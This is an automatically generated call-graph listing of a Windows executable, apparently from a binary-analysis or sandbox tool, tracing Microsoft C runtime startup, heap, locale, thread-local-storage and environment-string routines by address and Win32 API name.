6878f8 22422->22424 22425 692aff 22423->22425 22427 692ad7 22423->22427 22424->22409 22424->22418 22426 687445 _Fputc 29 API calls 22425->22426 22426->22424 22429 692b2a 22427->22429 22430 692b36 ___scrt_is_nonwritable_in_current_image 22429->22430 22437 692626 EnterCriticalSection 22430->22437 22432 692b44 22433 692b75 22432->22433 22438 6929e7 22432->22438 22451 692baf 22433->22451 22437->22432 22439 6923dd _Fputc 29 API calls 22438->22439 22442 6929f7 22439->22442 22440 6929fd 22454 692447 22440->22454 22442->22440 22443 692a2f 22442->22443 22444 6923dd _Fputc 29 API calls 22442->22444 22443->22440 22445 6923dd _Fputc 29 API calls 22443->22445 22446 692a26 22444->22446 22447 692a3b CloseHandle 22445->22447 22448 6923dd _Fputc 29 API calls 22446->22448 22447->22440 22449 692a47 GetLastError 22447->22449 22448->22443 22449->22440 22450 692a55 _Fputc 22450->22433 22463 692649 LeaveCriticalSection 22451->22463 22453 692b98 22453->22424 22455 6924bd 22454->22455 22456 692456 22454->22456 22457 686bb1 __dosmaperr 14 API calls 22455->22457 22456->22455 22461 692480 22456->22461 22458 6924c2 22457->22458 22459 686bc4 __dosmaperr 14 API calls 22458->22459 22460 6924ad 22459->22460 22460->22450 22461->22460 22462 6924a7 SetStdHandle 22461->22462 22462->22460 22463->22453 22464->22421 22465->22392 23970 68c717 23971 68c72c ___scrt_is_nonwritable_in_current_image 23970->23971 23982 687594 EnterCriticalSection 23971->23982 23973 68c733 23983 692588 23973->23983 23975 68c751 24002 68c777 23975->24002 23981 68c862 2 API calls 23981->23975 23982->23973 23984 692594 ___scrt_is_nonwritable_in_current_image 23983->23984 23985 69259d 23984->23985 23986 6925be 23984->23986 23987 686bb1 __dosmaperr 14 API calls 23985->23987 24005 687594 EnterCriticalSection 23986->24005 23989 6925a2 23987->23989 23990 68729c __strnicoll 29 API calls 23989->23990 23992 68c742 23990->23992 23991 6925f6 24013 69261d 23991->24013 23992->23975 23996 68c7ac GetStartupInfoW 23992->23996 23995 6925ca 23995->23991 24006 6924d8 23995->24006 23997 68c7c9 23996->23997 23998 68c74c 23996->23998 23997->23998 23999 692588 30 API calls 23997->23999 23998->23981 24000 68c7f1 23999->24000 24000->23998 24001 68c821 GetFileType 24000->24001 24001->24000 24017 6875ab LeaveCriticalSection 24002->24017 24004 68c762 24005->23995 24007 68c0e0 __dosmaperr 14 API calls 24006->24007 24009 6924ea 24007->24009 24008 6924f7 24010 68ad27 ___free_lconv_mon 14 API calls 24008->24010 24009->24008 24011 68bac7 6 API calls 24009->24011 24012 69254c 24010->24012 24011->24009 24012->23995 24016 6875ab LeaveCriticalSection 24013->24016 24015 692624 24015->23992 24016->24015 24017->24004 24076 67d1f8 24077 67d20c 24076->24077 24078 67d431 69 API calls 24077->24078 24083 67d267 24077->24083 24079 67d237 24078->24079 24080 67d254 24079->24080 24081 686c61 67 API calls 24079->24081 24079->24083 24080->24083 24084 687e7d 24080->24084 24081->24080 24085 687e88 24084->24085 24086 687e9d 24084->24086 24087 686bb1 __dosmaperr 14 API calls 24085->24087 24088 687eba 24086->24088 24089 687ea5 24086->24089 24090 687e8d 24087->24090 24098 691944 24088->24098 24091 686bb1 __dosmaperr 14 API calls 24089->24091 24093 68729c __strnicoll 29 API calls 24090->24093 24094 687eaa 24091->24094 24095 687e98 24093->24095 24096 68729c __strnicoll 29 API calls 24094->24096 24095->24083 24097 687eb5 24096->24097 24097->24083 24099 691958 _Fputc 24098->24099 24102 691eed 24099->24102 24101 691964 _Fputc 24101->24097 24103 691ef9 ___scrt_is_nonwritable_in_current_image 24102->24103 24104 691f00 24103->24104 24105 691f23 24103->24105 24107 687445 _Fputc 29 API calls 24104->24107 24113 681d4e EnterCriticalSection 24105->24113 24112 691f19 24107->24112 24108 691f31 24114 691d4c 24108->24114 24110 691f40 24127 691f72 24110->24127 24112->24101 24113->24108 24115 691d5b 24114->24115 24116 691d83 24114->24116 24117 687445 _Fputc 29 API calls 24115->24117 24118 68e509 _Ungetc 29 API calls 24116->24118 24124 691d76 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 24117->24124 24119 691d8c 24118->24119 24120 69177e 33 API calls 24119->24120 24121 691daa 24120->24121 24122 691e36 24121->24122 24121->24124 24125 691e4d 24121->24125 24123 6919d6 34 API calls 24122->24123 24123->24124 24124->24110 24125->24124 24126 691b81 33 API calls 24125->24126 24126->24124 24130 681d62 LeaveCriticalSection 24127->24130 24129 691f7a 24129->24112 24130->24129 22841 68ccc5 22844 6875ab LeaveCriticalSection 22841->22844 22843 68cccc 22844->22843 18805 67edd0 18806 67eddc ___scrt_is_nonwritable_in_current_image 18805->18806 18831 67bc28 18806->18831 18808 67ede3 18809 67ef3c 18808->18809 18819 67ee0d ___scrt_is_nonwritable_in_current_image __CreateFrameInfo ___scrt_release_startup_lock 18808->18819 18883 67e42c IsProcessorFeaturePresent 18809->18883 18811 67ef43 18862 684a0a 18811->18862 18816 67ee2c 18817 67eead 18842 686f89 18817->18842 18819->18816 18819->18817 18865 684a54 18819->18865 18821 67eeb3 18846 671bf0 18821->18846 18832 67bc31 18831->18832 18890 67e094 IsProcessorFeaturePresent 18832->18890 18836 67bc42 18841 67bc46 18836->18841 18900 681caf 18836->18900 18839 67bc5d 18839->18808 18841->18808 18843 686f97 18842->18843 18844 686f92 18842->18844 18843->18821 18972 6870b2 18844->18972 18847 671c2d 18846->18847 19882 672830 18847->19882 21207 684b55 18862->21207 18866 684a6a __dosmaperr 18865->18866 18867 68923b ___scrt_is_nonwritable_in_current_image 18865->18867 18866->18817 18868 68afb3 __Getctype 39 API calls 18867->18868 18869 68924c 18868->18869 18870 687806 CallUnexpected 39 API calls 18869->18870 18871 689276 18870->18871 18884 67e442 __CreateFrameInfo std::invalid_argument::invalid_argument 18883->18884 18885 67e4ed IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18884->18885 18886 67e531 __CreateFrameInfo 18885->18886 18886->18811 18887 684a20 18888 684b55 __CreateFrameInfo 21 API calls 18887->18888 18889 67ef51 18888->18889 18891 67bc3d 18890->18891 18892 67f76c 18891->18892 18909 68a9f6 18892->18909 18895 67f775 18895->18836 18897 67f77d 18898 67f788 18897->18898 18923 68aa32 18897->18923 18898->18836 18963 68d0ee 18900->18963 18903 67f78b 18904 67f794 18903->18904 18905 67f79e 18903->18905 18906 689acb ___vcrt_uninitialize_ptd 6 API calls 18904->18906 18905->18841 18907 67f799 18906->18907 18908 68aa32 ___vcrt_uninitialize_locks DeleteCriticalSection 18907->18908 18908->18905 18910 68a9ff 18909->18910 18912 68aa28 18910->18912 18913 67f771 18910->18913 18927 69527a 18910->18927 18914 68aa32 ___vcrt_uninitialize_locks DeleteCriticalSection 18912->18914 18913->18895 18915 689a98 18913->18915 18914->18913 18944 69518b 18915->18944 18918 689aad 18918->18897 18921 689ac8 18921->18897 18924 68aa5c 18923->18924 18925 68aa3d 18923->18925 18924->18895 18926 68aa47 DeleteCriticalSection 18925->18926 18926->18924 18926->18926 18932 69530c 18927->18932 18930 6952b2 InitializeCriticalSectionAndSpinCount 18931 69529d 18930->18931 18931->18910 18933 695294 18932->18933 18936 69532d 18932->18936 18933->18930 18933->18931 18934 695395 GetProcAddress 18934->18933 18936->18933 18936->18934 18937 695386 18936->18937 18939 6952c1 LoadLibraryExW 18936->18939 18937->18934 18938 69538e FreeLibrary 18937->18938 18938->18934 18940 6952d8 GetLastError 18939->18940 18941 695308 18939->18941 18940->18941 18942 6952e3 ___vcrt_FlsFree 18940->18942 18941->18936 18942->18941 18943 6952f9 LoadLibraryExW 18942->18943 18943->18936 18945 69530c ___vcrt_FlsFree 5 API calls 18944->18945 18946 6951a5 18945->18946 18947 6951be TlsAlloc 18946->18947 18948 689aa2 18946->18948 18948->18918 18949 69523c 18948->18949 18950 69530c ___vcrt_FlsFree 5 API calls 18949->18950 18951 695256 18950->18951 18952 695271 TlsSetValue 18951->18952 18953 689abb 18951->18953 18952->18953 18953->18921 18954 689acb 18953->18954 18955 689adb 18954->18955 18956 689ad5 18954->18956 18955->18918 18958 6951c6 18956->18958 18959 69530c ___vcrt_FlsFree 5 API calls 18958->18959 18960 6951e0 18959->18960 18961 6951f8 TlsFree 18960->18961 18962 6951ec 18960->18962 18961->18962 18962->18955 18964 68d0fe 18963->18964 18965 67bc4f 18963->18965 18964->18965 18967 68c862 18964->18967 18965->18839 18965->18903 18971 68c869 18967->18971 18968 68c8ac GetStdHandle 18968->18971 18969 68c90e 18969->18964 18970 68c8bf GetFileType 18970->18971 18971->18968 18971->18969 18971->18970 18973 6870bb 18972->18973 18976 6870d1 18972->18976 18973->18976 18978 686ff3 18973->18978 18975 6870c8 18975->18976 18995 6871c0 18975->18995 18976->18843 18979 686ffc 18978->18979 18980 686fff 18978->18980 18979->18975 19004 68c925 18980->19004 18985 68701c 19037 6870de 18985->19037 18986 687010 19031 68ad27 18986->19031 18991 68ad27 ___free_lconv_mon 14 API calls 18992 687040 18991->18992 18993 68ad27 ___free_lconv_mon 14 API calls 18992->18993 18994 687046 18993->18994 18994->18975 18996 687231 18995->18996 18999 6871cf 18995->18999 18996->18976 18997 68ae71 WideCharToMultiByte _Fputc 18997->18999 18998 68c0e0 __dosmaperr 14 API calls 18998->18999 18999->18996 18999->18997 18999->18998 19001 687235 18999->19001 19003 68ad27 ___free_lconv_mon 14 API calls 18999->19003 19601 692053 18999->19601 19000 68ad27 ___free_lconv_mon 14 API calls 19000->18996 19001->19000 19003->18999 19005 68c92e 19004->19005 19009 687005 19004->19009 19059 68b06e 19005->19059 19010 691f7c GetEnvironmentStringsW 19009->19010 19011 691f94 19010->19011 19024 68700a 19010->19024 19012 68ae71 _Fputc WideCharToMultiByte 19011->19012 19013 691fb1 19012->19013 19014 691fbb FreeEnvironmentStringsW 19013->19014 19015 691fc6 19013->19015 19014->19024 19016 68ad61 __strnicoll 15 API calls 19015->19016 19017 691fcd 19016->19017 19018 691fd5 19017->19018 19019 691fe6 19017->19019 19020 68ad27 ___free_lconv_mon 14 API calls 19018->19020 19021 68ae71 _Fputc WideCharToMultiByte 19019->19021 19022 691fda FreeEnvironmentStringsW 19020->19022 19023 691ff6 19021->19023 19022->19024 19025 691ffd 19023->19025 19026 692005 19023->19026 19024->18985 19024->18986 19028 68ad27 ___free_lconv_mon 14 API calls 19025->19028 19027 68ad27 ___free_lconv_mon 14 API calls 19026->19027 19029 692003 FreeEnvironmentStringsW 19027->19029 19028->19029 19029->19024 19032 687016 19031->19032 19033 68ad32 RtlFreeHeap 19031->19033 19032->18975 19033->19032 19034 68ad47 GetLastError 19033->19034 19035 68ad54 __dosmaperr 19034->19035 19036 686bb1 __dosmaperr 12 API calls 19035->19036 19036->19032 19038 6870f3 19037->19038 19039 68c0e0 __dosmaperr 14 API calls 19038->19039 19040 68711a 19039->19040 19041 687122 19040->19041 19050 68712c 19040->19050 19042 68ad27 ___free_lconv_mon 14 API calls 19041->19042 19058 687023 19042->19058 19043 687189 19044 68ad27 ___free_lconv_mon 14 API calls 19043->19044 19044->19058 19045 68c0e0 __dosmaperr 14 API calls 19045->19050 19046 687198 19591 687083 19046->19591 19050->19043 19050->19045 19050->19046 19052 6871b3 19050->19052 19054 68ad27 ___free_lconv_mon 14 API calls 19050->19054 19582 68a99c 19050->19582 19051 68ad27 ___free_lconv_mon 14 API calls 19053 6871a5 19051->19053 19597 6872c9 IsProcessorFeaturePresent 19052->19597 19056 68ad27 ___free_lconv_mon 14 API calls 19053->19056 19054->19050 19056->19058 19057 6871bf 19058->18991 19060 68b079 19059->19060 19061 68b07f 19059->19061 19106 68b9cb 19060->19106 19080 68b085 19061->19080 19111 68ba0a 19061->19111 19069 68b0b1 19072 68ba0a __dosmaperr 6 API calls 19069->19072 19070 68b0c6 19071 68ba0a __dosmaperr 6 API calls 19070->19071 19073 68b0d2 19071->19073 19074 68b0bd 19072->19074 19075 68b0e5 19073->19075 19076 68b0d6 19073->19076 19077 68ad27 ___free_lconv_mon 14 API calls 19074->19077 19125 68b2c4 19075->19125 19078 68ba0a __dosmaperr 6 API calls 19076->19078 19077->19080 19078->19074 19083 68b08a 19080->19083 19130 687806 19080->19130 19082 68ad27 ___free_lconv_mon 14 API calls 19082->19083 19084 68cce6 19083->19084 19085 68cd10 19084->19085 19403 68cb72 19085->19403 19090 68cd50 19417 68c96d 19090->19417 19091 68cd42 19092 68ad27 ___free_lconv_mon 14 API calls 19091->19092 19094 68cd29 19092->19094 19094->19009 19096 68cd88 19097 686bb1 __dosmaperr 14 API calls 19096->19097 19098 68cd8d 19097->19098 19102 68ad27 ___free_lconv_mon 14 API calls 19098->19102 19099 68cdcf 19101 68ce18 19099->19101 19428 68d0a1 19099->19428 19100 68cda3 19100->19099 19103 68ad27 ___free_lconv_mon 14 API calls 19100->19103 19105 68ad27 ___free_lconv_mon 14 API calls 19101->19105 19102->19094 19103->19099 19105->19094 19141 68be0d 19106->19141 19109 68b9f0 19109->19061 19110 68ba02 TlsGetValue 19112 68be0d __dosmaperr 5 API calls 19111->19112 19113 68ba26 19112->19113 19114 68b099 19113->19114 19115 68ba44 TlsSetValue 19113->19115 19114->19080 19116 68c0e0 19114->19116 19117 68c0ed 19116->19117 19118 68c12d 19117->19118 19119 68c118 HeapAlloc 19117->19119 19122 68c101 __dosmaperr 19117->19122 19159 686bb1 19118->19159 19120 68c12b 19119->19120 19119->19122 19123 68b0a9 19120->19123 19122->19118 19122->19119 19156 684d3c 19122->19156 19123->19069 19123->19070 19196 68b42a 19125->19196 19298 68d1a5 19130->19298 19133 687816 19135 687820 IsProcessorFeaturePresent 19133->19135 19140 68783f 19133->19140 19136 68782c 19135->19136 19328 6872fd 19136->19328 19137 684a20 __CreateFrameInfo 21 API calls 19139 687849 19137->19139 19140->19137 19142 68b9e7 19141->19142 19143 68be3d 19141->19143 19142->19109 19142->19110 19143->19142 19148 68bd42 19143->19148 19146 68be57 GetProcAddress 19146->19142 19147 68be67 __dosmaperr 19146->19147 19147->19142 19154 68bd53 ___vcrt_FlsFree 19148->19154 19149 68bde9 19149->19142 19149->19146 19150 68bd71 LoadLibraryExW 19151 68bd8c GetLastError 19150->19151 19152 68bdf0 19150->19152 19151->19154 19152->19149 19153 68be02 FreeLibrary 19152->19153 19153->19149 19154->19149 19154->19150 19155 68bdbf LoadLibraryExW 19154->19155 19155->19152 19155->19154 19162 684d77 19156->19162 19173 68b104 GetLastError 19159->19173 19161 686bb6 19161->19123 19163 684d83 ___scrt_is_nonwritable_in_current_image 19162->19163 19168 687594 EnterCriticalSection 19163->19168 19165 684d8e __CreateFrameInfo 19169 684dc5 19165->19169 19168->19165 19172 6875ab LeaveCriticalSection 19169->19172 19171 684d47 19171->19122 19172->19171 19174 68b11a 19173->19174 19175 68b120 19173->19175 19176 68b9cb __dosmaperr 6 API calls 19174->19176 19177 68ba0a __dosmaperr 6 API calls 19175->19177 19179 68b124 SetLastError 19175->19179 19176->19175 19178 68b13c 19177->19178 19178->19179 19181 68c0e0 __dosmaperr 12 API calls 19178->19181 19179->19161 19182 68b151 19181->19182 19183 68b159 19182->19183 19184 68b16a 19182->19184 19185 68ba0a __dosmaperr 6 API calls 19183->19185 19186 68ba0a __dosmaperr 6 API calls 19184->19186 19194 68b167 19185->19194 19187 68b176 19186->19187 19188 68b17a 19187->19188 19189 68b191 19187->19189 19191 68ba0a __dosmaperr 6 API calls 19188->19191 19190 68b2c4 __dosmaperr 12 API calls 19189->19190 19193 68b19c 19190->19193 19191->19194 19192 68ad27 ___free_lconv_mon 12 API calls 19192->19179 19195 68ad27 ___free_lconv_mon 12 API calls 19193->19195 19194->19192 19195->19179 19197 68b436 ___scrt_is_nonwritable_in_current_image 19196->19197 19210 687594 EnterCriticalSection 19197->19210 19199 68b440 19211 68b470 19199->19211 19202 68b47c 19203 68b488 ___scrt_is_nonwritable_in_current_image 19202->19203 19215 687594 EnterCriticalSection 19203->19215 19205 68b492 19216 68b279 19205->19216 19207 68b4aa 19220 68b4ca 19207->19220 19210->19199 19214 6875ab LeaveCriticalSection 19211->19214 19213 68b332 19213->19202 19214->19213 19215->19205 19217 68b2af __Getctype 19216->19217 19218 68b288 __Getctype 19216->19218 19217->19207 19218->19217 19223 68f4ca 19218->19223 19297 6875ab LeaveCriticalSection 19220->19297 19222 68b0f0 19222->19082 19225 68f54a 19223->19225 19226 68f4e0 19223->19226 19227 68ad27 ___free_lconv_mon 14 API calls 19225->19227 19250 68f598 19225->19250 19226->19225 19231 68ad27 ___free_lconv_mon 14 API calls 19226->19231 19245 68f513 19226->19245 19228 68f56c 19227->19228 19229 68ad27 ___free_lconv_mon 14 API calls 19228->19229 19232 68f57f 19229->19232 19230 68ad27 ___free_lconv_mon 14 API calls 19233 68f53f 19230->19233 19235 68f508 19231->19235 19237 68ad27 ___free_lconv_mon 14 API calls 19232->19237 19238 68ad27 ___free_lconv_mon 14 API calls 19233->19238 19234 68f606 19239 68ad27 ___free_lconv_mon 14 API calls 19234->19239 19251 68e92c 19235->19251 19236 68ad27 ___free_lconv_mon 14 API calls 19242 68f52a 19236->19242 19243 68f58d 19237->19243 19238->19225 19244 68f60c 19239->19244 19241 68ad27 14 API calls ___free_lconv_mon 19246 68f5a6 19241->19246 19279 68ec47 19242->19279 19248 68ad27 ___free_lconv_mon 14 API calls 19243->19248 19244->19217 19245->19236 19249 68f535 19245->19249 19246->19234 19246->19241 19248->19250 19249->19230 19291 68f664 19250->19291 19252 68e93d 19251->19252 19253 68ea26 19251->19253 19254 68e94e 19252->19254 19255 68ad27 ___free_lconv_mon 14 API calls 19252->19255 19253->19245 19256 68e960 19254->19256 19258 68ad27 ___free_lconv_mon 14 API calls 19254->19258 19255->19254 19257 68e972 19256->19257 19259 68ad27 ___free_lconv_mon 14 API calls 19256->19259 19260 68e984 19257->19260 19261 68ad27 ___free_lconv_mon 14 API calls 19257->19261 19258->19256 19259->19257 19262 68e996 19260->19262 19263 68ad27 ___free_lconv_mon 14 API calls 19260->19263 19261->19260 19263->19262 19280 68ecac 19279->19280 19281 68ec54 19279->19281 19280->19249 19282 68ec64 19281->19282 19283 68ad27 ___free_lconv_mon 14 API calls 19281->19283 19284 68ec76 19282->19284 19285 68ad27 ___free_lconv_mon 14 API calls 19282->19285 19283->19282 19286 68ec88 19284->19286 19287 68ad27 ___free_lconv_mon 14 API calls 19284->19287 19285->19284 19288 68ec9a 19286->19288 19289 68ad27 ___free_lconv_mon 14 API calls 19286->19289 19287->19286 19288->19280 19289->19288 19292 68f690 19291->19292 19293 68f671 19291->19293 19292->19246 19293->19292 19294 68ed2b __Getctype 14 API calls 19293->19294 19295 68f68a 19294->19295 19296 68ad27 ___free_lconv_mon 14 API calls 19295->19296 19296->19292 19297->19222 19334 68d428 19298->19334 19301 68d1cc 19304 68d1d8 ___scrt_is_nonwritable_in_current_image 19301->19304 19302 68b104 __dosmaperr 14 API calls 19310 68d209 __CreateFrameInfo 19302->19310 19303 68d228 19306 686bb1 __dosmaperr 14 API calls 19303->19306 19304->19302 19304->19303 19305 68d23a __CreateFrameInfo 19304->19305 19304->19310 19307 68d270 __CreateFrameInfo 19305->19307 19348 687594 EnterCriticalSection 19305->19348 19308 68d22d 19306->19308 19314 68d2ad 19307->19314 19315 68d3aa 19307->19315 19325 68d2db 19307->19325 19345 68729c 19308->19345 19310->19303 19310->19305 19312 68d212 19310->19312 19312->19133 19314->19325 19349 68afb3 GetLastError 19314->19349 19316 68d3b5 19315->19316 19380 6875ab LeaveCriticalSection 19315->19380 19319 684a20 __CreateFrameInfo 21 API calls 19316->19319 19321 68d3bd 19319->19321 19322 68afb3 __Getctype 39 API calls 19326 68d330 19322->19326 19324 68afb3 __Getctype 39 API calls 19324->19325 19376 68d356 19325->19376 19326->19312 19327 68afb3 __Getctype 39 API calls 19326->19327 19327->19312 19329 687319 __CreateFrameInfo std::invalid_argument::invalid_argument 19328->19329 19330 687345 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19329->19330 19331 687416 __CreateFrameInfo 19330->19331 19395 67ba3f 19331->19395 19333 687434 19333->19140 19335 68d434 ___scrt_is_nonwritable_in_current_image 19334->19335 19340 687594 EnterCriticalSection 19335->19340 19337 68d442 19341 68d484 19337->19341 19340->19337 19344 6875ab LeaveCriticalSection 19341->19344 19343 68780b 19343->19133 19343->19301 19344->19343 19381 6874eb 19345->19381 19347 6872a8 19347->19312 19348->19307 19350 68afc9 19349->19350 19351 68afcf 19349->19351 19353 68b9cb __dosmaperr 6 API calls 19350->19353 19352 68ba0a __dosmaperr 6 API calls 19351->19352 19355 68afd3 SetLastError 19351->19355 19354 68afeb 19352->19354 19353->19351 19354->19355 19357 68c0e0 __dosmaperr 14 API calls 19354->19357 19359 68b068 19355->19359 19360 68b063 19355->19360 19358 68b000 19357->19358 19361 68b008 19358->19361 19362 68b019 19358->19362 19363 687806 CallUnexpected 37 API calls 19359->19363 19360->19324 19365 68ba0a __dosmaperr 6 API calls 19361->19365 19366 68ba0a __dosmaperr 6 API calls 19362->19366 19364 68b06d 19363->19364 19373 68b016 19365->19373 19367 68b025 19366->19367 19368 68b029 19367->19368 19369 68b040 19367->19369 19370 68ba0a __dosmaperr 6 API calls 19368->19370 19372 68b2c4 __dosmaperr 14 API calls 19369->19372 19370->19373 19371 68ad27 ___free_lconv_mon 14 API calls 19371->19355 19374 68b04b 19372->19374 19373->19371 19375 68ad27 ___free_lconv_mon 14 API calls 19374->19375 19375->19355 19377 68d35a 19376->19377 19378 68d322 19376->19378 19394 6875ab LeaveCriticalSection 19377->19394 19378->19312 19378->19322 19378->19326 19380->19316 19382 6874fd _Fputc 19381->19382 19385 687445 19382->19385 19384 687515 _Fputc 19384->19347 19386 68745c 19385->19386 19387 687455 19385->19387 19389 6874c2 _Fputc GetLastError SetLastError 19386->19389 19390 68746a 19386->19390 19388 682240 _Fputc 16 API calls 19387->19388 19388->19386 19391 687491 19389->19391 19390->19384 19391->19390 19392 6872c9 __Getctype 11 API calls 19391->19392 19393 6874c1 19392->19393 19394->19378 19396 67ba47 19395->19396 19397 67ba48 IsProcessorFeaturePresent 19395->19397 19396->19333 19399 67df86 19397->19399 19402 67e06c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 19399->19402 19401 67e069 19401->19333 19402->19401 19436 68142a 19403->19436 19406 68cb93 GetOEMCP 19409 68cbbc 19406->19409 19407 68cba5 19408 68cbaa GetACP 19407->19408 19407->19409 19408->19409 19409->19094 19410 68ad61 19409->19410 19411 68ad9f 19410->19411 19415 68ad6f __dosmaperr 19410->19415 19412 686bb1 __dosmaperr 14 API calls 19411->19412 19414 68ad9d 19412->19414 19413 68ad8a RtlAllocateHeap 19413->19414 19413->19415 19414->19090 19414->19091 19415->19411 19415->19413 19416 684d3c std::ios_base::_Init 2 API calls 19415->19416 19416->19415 19418 68cb72 41 API calls 19417->19418 19420 68c98d 19418->19420 19419 68ca92 19422 67ba3f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 19419->19422 19420->19419 19421 68c9e5 std::invalid_argument::invalid_argument 19420->19421 19423 68c9ca IsValidCodePage 19420->19423 19476 68cefc 19421->19476 19424 68cb70 19422->19424 19423->19419 19425 68c9dc 19423->19425 19424->19096 19424->19100 19425->19421 19426 68ca05 GetCPInfo 19425->19426 19426->19419 19426->19421 19429 68d0ad ___scrt_is_nonwritable_in_current_image 19428->19429 19556 687594 EnterCriticalSection 19429->19556 19431 68d0b7 19557 68ce3b 19431->19557 19437 681448 19436->19437 19443 681441 19436->19443 19438 68afb3 __Getctype 39 API calls 19437->19438 19437->19443 19439 681469 19438->19439 19444 68b596 19439->19444 19443->19406 19443->19407 19445 68b5a9 19444->19445 19446 68147f 19444->19446 19445->19446 19452 68f695 19445->19452 19448 68b5c3 19446->19448 19449 68b5eb 19448->19449 19450 68b5d6 19448->19450 19449->19443 19450->19449 19473 68c912 19450->19473 19453 68f6a1 ___scrt_is_nonwritable_in_current_image 19452->19453 19454 68afb3 __Getctype 39 API calls 19453->19454 19455 68f6aa 19454->19455 19462 68f6f0 19455->19462 19465 687594 EnterCriticalSection 19455->19465 19457 68f6c8 19466 68f716 19457->19466 19462->19446 19463 687806 CallUnexpected 39 API calls 19464 68f715 19463->19464 19465->19457 19467 68f724 __Getctype 19466->19467 19469 68f6d9 19466->19469 19468 68f4ca __Getctype 14 API calls 19467->19468 19467->19469 19468->19469 19470 68f6f5 19469->19470 19471 6875ab std::_Lockit::~_Lockit LeaveCriticalSection 19470->19471 19472 68f6ec 19471->19472 19472->19462 19472->19463 19474 68afb3 __Getctype 39 API calls 19473->19474 19475 68c917 19474->19475 19475->19449 19477 68cf24 GetCPInfo 19476->19477 19486 68cfed 19476->19486 19482 68cf3c 19477->19482 19477->19486 19479 67ba3f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 19481 68d09f 19479->19481 19481->19419 19487 68c3cc 19482->19487 19486->19479 19488 68142a __strnicoll 39 API calls 19487->19488 19489 68c3ec 19488->19489 19507 68adaf 19489->19507 19491 68c4a8 19495 67ba3f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 19491->19495 19492 68c4a0 19510 67ea27 19492->19510 19493 68c43e std::invalid_argument::invalid_argument __alloca_probe_16 19493->19492 19499 68adaf __strnicoll MultiByteToWideChar 19493->19499 19494 68c419 19494->19491 19494->19492 19494->19493 19497 68ad61 __strnicoll 15 API calls 19494->19497 19498 68c4cb 19495->19498 19497->19493 19502 68c4cd 19498->19502 19500 68c487 19499->19500 19500->19492 19501 68c48e GetStringTypeW 19500->19501 19501->19492 19503 68142a __strnicoll 39 API calls 19502->19503 19504 68c4e0 19503->19504 19519 68c516 19504->19519 19514 68add9 19507->19514 19511 67ea42 19510->19511 19512 67ea31 19510->19512 19511->19491 19512->19511 19516 68831e 19512->19516 19515 68adcb MultiByteToWideChar 19514->19515 19515->19494 19517 68ad27 ___free_lconv_mon 14 API calls 19516->19517 19518 688336 19517->19518 19518->19511 19520 68c531 __strnicoll 19519->19520 19521 68adaf __strnicoll MultiByteToWideChar 19520->19521 19525 68c575 19521->19525 19522 68c6f0 19525->19522 19526 68ad61 __strnicoll 15 API calls 19525->19526 19528 68c59b __alloca_probe_16 19525->19528 19539 68c643 19525->19539 19526->19528 19528->19539 19556->19431 19567 688d0b 19557->19567 19559 68ce5d 19560 688d0b 29 API calls 19559->19560 19561 68ce7c 19560->19561 19562 68cea3 19561->19562 19563 68ad27 ___free_lconv_mon 14 API calls 19561->19563 19564 68d0e2 19562->19564 19563->19562 19581 6875ab LeaveCriticalSection 19564->19581 19566 68d0d0 19566->19101 19568 688d1c 19567->19568 19577 688d18 codecvt 19567->19577 19569 688d23 19568->19569 19573 688d36 std::invalid_argument::invalid_argument 19568->19573 19570 686bb1 __dosmaperr 14 API calls 19569->19570 19571 688d28 19570->19571 19572 68729c __strnicoll 29 API calls 19571->19572 19572->19577 19574 688d6d 19573->19574 19575 688d64 19573->19575 19573->19577 19574->19577 19579 686bb1 __dosmaperr 14 API calls 19574->19579 19576 686bb1 __dosmaperr 14 API calls 19575->19576 19578 688d69 19576->19578 19577->19559 19580 68729c __strnicoll 29 API calls 19578->19580 19579->19578 19580->19577 19581->19566 19583 68a9aa 19582->19583 19584 68a9b8 19582->19584 19583->19584 19589 68a9d0 19583->19589 19585 686bb1 __dosmaperr 14 API calls 19584->19585 19586 68a9c0 19585->19586 19587 68729c __strnicoll 29 API calls 19586->19587 19588 68a9ca 19587->19588 19588->19050 19589->19588 19590 686bb1 __dosmaperr 14 API calls 19589->19590 19590->19586 19592 687090 19591->19592 19596 6870ad 19591->19596 19593 6870a7 19592->19593 19594 68ad27 ___free_lconv_mon 14 API calls 19592->19594 19595 68ad27 ___free_lconv_mon 14 API calls 19593->19595 19594->19592 19595->19596 19596->19051 19598 6872d5 19597->19598 19599 6872fd __CreateFrameInfo 8 API calls 19598->19599 19600 6872ea GetCurrentProcess TerminateProcess 19599->19600 19600->19057 19602 69205e 19601->19602 19603 69206f 19602->19603 19606 692082 ___from_strstr_to_strchr 19602->19606 19604 686bb1 __dosmaperr 14 API calls 19603->19604 19613 692074 19604->19613 19605 692299 19608 686bb1 __dosmaperr 14 API calls 19605->19608 19606->19605 19607 6920a2 19606->19607 19664 6922be 19607->19664 19609 69229e 19608->19609 19611 68ad27 ___free_lconv_mon 14 API calls 19609->19611 19611->19613 19613->18999 19614 6920e6 19650 6920d2 19614->19650 19668 6922d8 19614->19668 19615 6920e8 19619 68c0e0 __dosmaperr 14 API calls 19615->19619 19615->19650 19617 6920c4 19622 6920cd 19617->19622 19623 6920e1 19617->19623 19621 6920f6 19619->19621 19620 68ad27 ___free_lconv_mon 14 API calls 19620->19613 19625 68ad27 ___free_lconv_mon 14 API calls 19621->19625 19626 686bb1 __dosmaperr 14 API calls 19622->19626 19627 6922be 39 API calls 19623->19627 19624 69215b 19628 68ad27 ___free_lconv_mon 14 API calls 19624->19628 19629 692101 19625->19629 19626->19650 19627->19614 19637 692163 19628->19637 19629->19614 19632 68c0e0 __dosmaperr 14 API calls 19629->19632 19629->19650 19630 6921a6 19631 691673 std::ios_base::_Init 32 API calls 19630->19631 19630->19650 19633 6921d4 19631->19633 19634 69211d 19632->19634 19636 68ad27 ___free_lconv_mon 14 API calls 19633->19636 19639 68ad27 ___free_lconv_mon 14 API calls 19634->19639 19635 69228e 19640 68ad27 ___free_lconv_mon 14 API calls 19635->19640 19641 692190 19636->19641 